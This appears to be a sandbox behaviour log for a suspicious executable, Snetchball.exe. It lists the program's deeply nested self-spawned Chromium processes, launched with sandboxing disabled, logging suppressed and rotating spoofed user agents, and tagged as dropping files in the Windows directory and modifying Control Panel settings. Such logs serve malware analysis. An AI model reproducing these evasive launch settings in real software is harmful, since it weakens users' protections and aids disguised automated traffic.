C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=2792,i,11155713609606705709,2032722964553027403,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:198⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2792,i,11155713609606705709,2032722964553027403,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:198⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"99⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2772,i,17357826977774243731,15349214605256405421,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2101⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 --field-trial-handle=2772,i,17357826977774243731,15349214605256405421,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8101⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3096 --field-trial-handle=2772,i,17357826977774243731,15349214605256405421,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8101⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2772,i,17357826977774243731,15349214605256405421,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1101⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2772,i,17357826977774243731,15349214605256405421,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1101⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"103⤵
- Drops file in Windows directory
- Modifies Control Panel
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"103⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"103⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"103⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"103⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"102⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"100⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"99⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"99⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"99⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"99⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4212 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:195⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"94⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"94⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"94⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"94⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:192⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:192⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:189⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3780 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:189⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5868 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:889⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:187⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1880 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:187⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:184⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4916 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:184⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3672 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:181⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:178⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3788 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:178⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
-
-
